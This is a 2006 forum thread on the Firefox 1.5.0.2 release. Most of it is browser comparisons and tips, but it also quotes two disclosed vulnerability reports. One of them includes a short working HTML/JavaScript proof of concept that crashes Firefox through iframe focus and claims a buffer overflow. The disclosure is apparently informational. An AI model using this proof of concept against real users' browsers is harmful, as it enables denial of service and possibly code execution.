A new version of Firefox has just gone live over on the official site.

Here's what's new in Firefox 1.5.0.2:

* Universal Binary support for Mac OS X which provides native support for Macintosh with Intel Core processors. Firefox supports the enhancements to performance introduced by the new MacIntel chipsets.
* Improvements to product stability.
* Several security fixes.

Grab it for Linux, Windows or Mac OS X locally.

damm, I just downloaded 1.5.0.1 a few hours ago

FF 1.5 was s*** compared to the previous version... I give up on Firefox. IE ftw.

great stuff, lets just hope it doesn't break any of my plugins :(

FF 1.5 was s*** compared to the previous version... I give up on Firefox. IE ftw.

nice troll, needs dragons

nice troll, needs dragons

needs girls in bottles.

I recently re-tried Opera as I got sick of Firefox's weakness with loading many pages at once. For example middle-click 10-20 links or thumbnails on any site. After a few minutes of doing this, the browser becomes unusable and eventually crashes.

Unfortunately Opera doesn't handle tab-closing the same way as Firefox does. When you close a tab you end up at the previous tab you were at, and not the adjacent tab .. so no quick link/screenshot browsing :(

Better than IE (non-beta) anyway. You'd end up with 20 windows (not tabs), each of which will steal focus and make it impossible to open up lots of links at once.

The tabs are the single reason I use firefox - but its a f***ing huge reason.

VERY f***ING HUGE MKAY

Firefox FTW, the plug in's are what make it rock.

Just run Maxthon, it's IE with tabs that work like FF, not like opera.

it's IE with tabs

f*** that.

Didn't you see the last IE spoofing bug?!>@# you're mad if you're still running IE. MS's security update stuff is good, but they're not frequent enough. They need a 'security beta patch' system or something so they can get our zero day fixes for security conscious types.

All these IE exploits are a great example as to why the browser shouldn't be so tightly integrated in with the OS.

I think I just found some info and a fix regarding the tab memory issue:

http://kb.mozillazine.org/Browser.sessionhistory.max_total_viewers

Pages that were recently visited are stored in memory in such a way that they don't have to be re-parsed (this is different than the cache). This improves performance when pressing Back and Forward.
...
Users who are having problems with memory consumption can try setting the value to something lower than specified in the table above to lower memory consumption

Yay!

Seems like slashdot has already covered this: "Firefox Memory Leak is a Feature"

it's IE with tabs that work like FF

Do you also run Windows95 with an XP wallpaper and call it internet-ready?

Nah has to be Windows 98

How could you live without active desktop

been using opera lately. firefox just eats too much ram if you have lots of tabs and windows open. opera has changed a lot since last time i used it, pretty fast and cool features

phatmike, please read the thread.

It's already been discussed.

Firefox works great for me so I'll be sticking with it until something better comes along.

if someone could google-up a few decent damn good reasons for me to use and reccommend FF instead of Ops I'd be happy to.


is Opera still technically the last browser imune to adware/spyware or has that changed now?

is Opera still technically the last browser imune to adware/spyware or has that changed now?

The f***? It's never been 'immune', it's just no-one cares to develop any kind of malware for it.

Meh, as long as you're all using standards compliant browsers the web developers of the world are happy.

FF rocks because of the community. Simple as that. It's always getting better not just becaise of the patches here and there, but because s*** like AdBlock, TabMixPlus and Flashgot are getting better too.

Plus I'm always seeing stuff like "download the firefox plugin here" around the place, full support is on its way. Also, I seriously haven't seen an ad in my browser for months, maybe a year now. I get no adware/spyware and it's a very fast browsers. Only qualm with it is it's initial load time, would love to see that fixed, but it's not a major issue, more important things to worry about.

http://daveo.pcware.com.au/getfirefox/Wheee!.mov

Seven, I believe the delay in the initial loading time is due to the plugin's and add-ons. I can handle the delay in the beginning if it means I get the goodness of FF.

I agree Tanaka, no real reason to complain if the end result is using FF over the others. Also parabol, that vid made me lol, awesome.

Date: 18 Apr 2006 14:38:34 -0000
Subject: Another flaw in Firefox 1.5.0.2: to open files from remote

https://bugzilla.mozilla.org/show_bug.cgi?id=334341

It is possible by a malicious web site to open local content in the browser by tricking a user into right-clicking and choosing "View Image" on a broken image, which is referencing a local resource (e.g. via the file: URI handler).

This may be exploited in combination with other vulnerabilities.

The weakness has been confirmed in version 1.5.0.2. Other versions may also be affected.

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.2)
Gecko/20060308 Firefox/1.5.0.2
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.2)
Gecko/20060308 Firefox/1.5.0.2

A bug has been discovered by myself(TeamOverload) in Firefox 1.5.0.2(other versions are probably affected too). Through a specially crafted webpage you can have any file be disguised as an image. If you then right click-view image, the file will attempt to download or just run if it is on the bypass list. Some extensions such as .wma are defaulted like that and a malformed wma can be loaded just by going to view image. Other websites can be loaded this way as well.

Reproducible: Always

Steps to Reproduce:
1.Download attached archive that causes problem 2.Launch web page, and right click and choose show image on both 3.First image should open WindowsMediaPlayer and the second should go to a different web page.

Actual Results:
Both WMP and the alternate web page opened.

last edited by Jim at 08:10:21 19/Apr/06

---------------------------------------------------
Software:
Firefox Web Browser
Tested:
Linux, Windows clients' version 1.5.0.2
Result:
Firefox Remote Code Execution and Denial of Service - Vendor contacted, no patch yet.
Problem:
A handling issue exists in how Firefox handles certain Javascript in js320.dll and xpcom_core.dll
regarding iframe.contentWindow.focus(). By manipulating this feature a buffer overflow will occur.
Proof of Concept:
http://www.securident.com/vuln/ff.txt
Credits:
splices(splices [dot] org)
spiffomatic64(spiffomatic64 [dot] com)
Securident Technologies (securident [dot] com)
------------------------------------------------


http://www.securident.com/vuln/ffdos.htm - PoC firefox dos


Paste the below code snippet and view it in Firefox for DoS PoC or visit the link above.

<textarea cols="0" rows="0" id="x_OtherInfo" name="x_OtherInfo"></textarea>
<script>
var textarea = document.getElementsByName("x_OtherInfo");
textarea=textarea.item(0);
var htmlarea = document.createElement("div");
htmlarea.className = "htmlarea";
textarea.parentNode.insertBefore(htmlarea, textarea);
var iframe = document.createElement("iframe");
htmlarea.appendChild(iframe);
var doc = iframe.contentWindow.document;
doc.designMode = "on";
doc.open();
doc.write("<iframe src=''>");
iframe.contentWindow.focus()
doc.close();
</script>
</textarea>

-DISCLAIMER-
splices,spiffomatic64, and securident are not responsible for any of the information contained therein,
this is all just for informational purposes only.

last edited by Jim at 07:38:38 25/Apr/06

Unfortunately Opera doesn't handle tab-closing the same way as Firefox does. When you close a tab you end up at the previous tab you were at, and not the adjacent tab .. so no quick link/screenshot browsing :(

I also hate the fact that the tabs the closed button attached to them, rather than always in the top right corner... so if you want to close your 4th tab, of 10. You have to click close on the 4th tab, rather than just select the 4th tab and hit the "regular" close button.

Maxthon is a piece of s***, you're better off getting ietab, then you can run firefox and ie tabs in one browser.

It took Jim almost a whole week to find a second exploit to paste here.

Keep it up buddy!

so unsafe

That's why you use noscript.

cheers parabol, I will

I'd post a list of IE exploits but I don't want to break your forum.

oh is that what this is about?
what are you, twelve?

If it makes you feel better, yes.

nah it won't make me feel better, but it'd sure explain why you'd get cut at my post

If your intentions were for informative purposes only, I will cancel my e-hatred :)

To contribute to this thread, I'd like to paste a link to Scrapbook, a web-page saver. All saved pages can be looked at via bookmarks, edited, highlighted, etc. Good for storing uni assignment pages for example.

http://amb.vis.ne.jp/mozilla/scrapbook/

another reason to have upgraded:
http://www.zerodayinitiative.com/advisories/ZDI-06-011.html

it's worth noting the time difference between when mozilla was made aware of this and the time they released a patch. should've been fully disclosed

oh nos we're doomed